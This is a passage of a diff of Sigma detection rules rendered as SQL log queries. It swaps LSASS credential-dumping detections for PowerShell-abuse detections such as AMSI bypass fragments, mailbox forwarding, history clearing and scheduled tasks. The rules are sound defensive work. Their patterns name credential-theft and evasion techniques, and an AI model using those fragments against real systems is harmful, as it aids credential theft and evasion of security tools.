ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS 
Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" ], - "filename": "proc_access_win_rare_proc_access_lsass.yml" + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", - "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "status": "test", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_syncappvpublishingserver_exe.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE 
'\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", + "title": "Powershell Create Scheduled Task", + "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "author": "frack113", "tags": [ - "attack.t1548" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_cmdlet_scheduled_task.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "Powershell LocalAccount Manipulation", + "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess 
LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_localuser.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Clear PowerShell History - PowerShell", + "id": "26b692dc-1722-49b2-b496-a8258aa6371d", + "status": "experimental", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": 
[ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') 
AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_clear_powershell_history.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "title": "Security Software Discovery by Powershell", + "id": "904e8e61-8edf-4350-b59c-b905fc8e810c", "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on 
the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-process%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Description%' ESCAPE '\\' AND ScriptBlockText LIKE '%-like%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\"%virus%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%carbonblack%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%defender%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%cylance%\"%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_security_software_discovery.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", + "id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - 
"author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.discovery", + "attack.t1201" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdDefaultDomainPasswordPolicy%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "status": "test", + "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", + "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + 
"attack.t1059.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = 
'4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.CustomAttributeBuilder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.UnmanagedType%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_keywords.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Recon Information for Export with PowerShell", + "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage 
LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_susp_recon_export.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "title": "Powershell XML Execute Command", + "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program 